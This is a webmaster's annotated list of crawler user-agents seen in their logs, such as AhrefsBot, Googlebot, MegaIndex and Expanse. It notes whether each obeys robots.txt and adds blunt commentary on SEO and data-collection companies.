ZoomInfo is used by salespeople, marketers, and recruiters to optimize their lead generation efforts by providing them access to a vast business contact database and numerous sales intelligence and prospecting tools.

Who buys this dredge...

Twingly Recon-Klondike/1.0 (+https://developer.twingly.com)

• Does not read robots.txt.

A Search API:

Twingly Blog Search API is a commercial XML over HTTP API that enables machine access to Twingly’s blog search index.

It is very interesting. From their Terms of Use:

Twingly is a Search Engine for Conversational Media such as Blogs. Our API and Widgets are free for personal use, and we offer paid licenses for commercial use. You can use Twingly Widgets without registering, but in doing so you accept these terms of use.

But they do not seem to have any - as my logs show - support for robots.txt. Their main page is full of dredge like:

We keep track of updates from millions of online sources like blogs, forums, news, etc. Our focus is a broad coverage that includes all significant sources in each country. Through our easily integrated APIs, you get access to all that social data at your fingertips!

My fingers just blocked you!

Mail.RU_Bot/2.0 +http://go.mail.ru/help/robots

• Adheres to robots.txt.

They have been around for a long time. And I have no idea what they do.

DotBot/1.2; +https://opensiteexplorer.org/dotbot help@moz.com

• Adheres to robots.txt.

Redirects to https://moz.com/link-explorer, which says:

Enter the URL of the website or page you want to get link data for. Create a Moz account to access Link Explorer and other free SEO tools. Get a comprehensive analysis for the URL you entered, plus much more!

I think not! Plus much more!

Editorial: Light but like they get robots.txt and one more link about 80 times a month. What's up with that? Oh, and the scarf/snarf all the available ZIP files. That's fucked up. But I am being nice and just putting them on the list...

Googlebot/2.1 +http://www.google.com/bot.html

UPDATE: I am now seeing Google results with "https://www.google.com/url?q="...

I no longer use Google for searches. Hover over their generated links and Google LIES! They do not reflect the true URL, as all of them go directly to Google with a ton of META data they use to track you before redirecting to the actual result. That is DISHONEST.

CCBot/2.0 https://commoncrawl.org/faq/

Adheres to robots.txt.

We build and maintain an open repository of web crawl data that can be accessed and analyzed by anyone.

hrankbot/1.0 +https://www.hrank.com/bot

• Does not read robots.txt.

Which web hosting is better? We rank 300 Shared Web Hosting Providers by Uptime, Response Time and other features. Now we know for sure!

Yer blocked fer sher!

Barkrowler/0.9 +https://babbar.tech/crawler

• Does read robots.txt.

Using Babbar, SEO gets easier. Thanks to Babbar’s data and metrics, uncover the strengths and weaknesses of your site and its competitors. Babbar helps you set up truly effective link building strategies thanks to its understanding of link and page semantics.

sigh Where do these people come from? Marketing 101 I guess. (Which just means the BS is good looking.)

ips-agent

Adheres to robots.txt.

No one seems to know who/what they. Verisign hosted. Many "IPS Insurance Agent" related pages. Could also mean Intrusion Prevention Systems. It's a WTF?

MegaIndex.ru/2.0 +http://megaindex.com/crawler

• Does, does not adhere to robots.txt.

Web Search.

    [18/Oct/2021:23:47:20] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
    [18/Oct/2021:23:47:22] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

They get the root page and THEN get robots.txt. WTF? (But that could be an Apache thing.)

SEOkicks +https://www.seokicks.de/robot.html

• Does adhere to robots.txt.

Ditto.

Adsbot/3.1 +https://seostar.co/robot/

• Does adhere to robots.txt.

I have zero need, and less tolerance for, "SEO" Bots and their shady services.

Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07)

• Does adhere to robots.txt.

Dataprovider.com

• Does, does not, adhere to robots.txt.

Again, why get root and THEN get robots.txt?

    [18/Oct/2021:09:48:07] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
    [18/Oct/2021:09:48:10] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"

(I did think Apache "log issues" but by three seconds? I don't know.)

More dredge:

Dataprovider.com transforms the internet into a structured database of web data. Our technology produces rock-solid insights today to empower your decisions for tomorrow. Start your free trial

No thanks.

AhrefsBot/7.0 +http://ahrefs.com/robot/

• Does adhere to robots.txt.

An SEO for paying customers to keep tabs on their own website. Therefore, they have no reason to crawl my websites.

ahrefs is an All-in-one SEO toolset, with free Learning materials and a passionate Community & support

"AhrefsBot is a Web Crawler that powers the 12 trillion link database for Ahrefs online marketing toolset. It constantly crawls web to fill our database with new links and check the status of the previously found ones to provide the most comprehensive and up-to-the-minute data to our users.

Link data collected by Ahrefs Bot from the web is used by thousands of digital marketers around the world to plan, execute, and monitor their online marketing campaigns.

DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot)

• Does adhere to robots.txt.

Microsoft Office/14.0; (Windows NT 6.1; Microsoft Outlook 14.0.7143 Pro)

• Does not read robots.txt.

Seen last week for the first time and just one GET / HTTP/1.1. Weird.

Expanse https://expanse.co/

• Does not read robots.txt..

This is their new UA:

Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com

WOW and WTF!

Via badbot.itproxy.uk: "I'm not one of their customers, so why are they all over my websites like a rash?"

Well, they are checking to see if their customers are mentioned on your website...

Their website says Expanse "protects around 10% of the overall Internet."

Yeah, right...

ALittle Client

• Does not adhere to robots.txt.

All requests are for Wordpress exploits.

ThinkChaos/0.3.0 +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.

• Does not adhere to robots.txt despite what it says.

Gets just "/" so far. Has footprints on the web as a developer(s) on Github and Stack Overflow. Saw this: "I just noticed a new user-agent string called ThinkChaos out of Tencent IP..."

A WTF as far as I can see.

SemrushBot/7~bl +http://www.semrush.com/bot.html

• Does adhere to robots.txt.

This is a weird one. Just gets a few pages over and over all month long, using a ill-formed URL. Still trying them even after a few weeks of 404's.

PetalBot +https://webmaster.petalsearch.com/site/petalbot

• Does adhere to robots.txt.

A search engine owned by Chinese telecom Huawei.

MJ12bot/v1.4.8 http://mj12bot.com/

• Does adhere to robots.txt.

BLEXBot/1.0 +http://webmeup-crawler.com/

• Does (lately not) adhere to robots.txt.

Pay for SEO...

The BLEXBot crawler is an automated robot that visits pages to examine and analyse the content, in this sense it is similar to the robots used by the major search engine companies.

Um, okay, but:

BLEXBot assists internet marketers to get information on the link structure of sites and their interlinking on the web, to avoid any technical and possible legal issues and improve overall online experience. To do this it is necessary to examine, or crawl, the page to collect and check all the links it has in its content.

Not mine.

MojeekBot/0.10 +https://www.mojeek.com/bot.html

• Does adhere to robots.txt.

Bytespider https://zhanzhang.toutiao.com/

• Does adhere to robots.txt.

Since it is all in Mandarin, I can't tell what they do.

The phpbb.com community does not like this one.

SEOkicks +https://www.seokicks.de/robot.html

• Does adhere to robots.txt.

What they say:

SEOkicks continuously collects link data with its own crawlers and makes them available via website, CSV export and API. The current index comprises more than 200 billion link data records.

Yawn.

DotBot/1.2 +https://opensiteexplorer.org/dotbot

• Does adhere to robots.txt.

Redirects to https://moz.com/link-explorer.

"Your All-In-One Suite of SEO Tools The essential SEO toolset: keyword research, link building, site audits, page optimization, rank tracking, reporting, and more."

Yeah, whatever. But, ah... Why?

YandexBot/3.0 +http://yandex.com/bots

• Does adhere to robots.txt.

Search engine.

Yandex is a technology company that builds intelligent products and services powered by machine learning. Our goal is to help consumers and businesses better navigate the online and offline world. Since 1997, we have delivered world-class, locally relevant search and information services. Additionally, we have developed market-leading on-demand transportation services, navigation products, and other mobile applications for millions of consumers across the globe.

--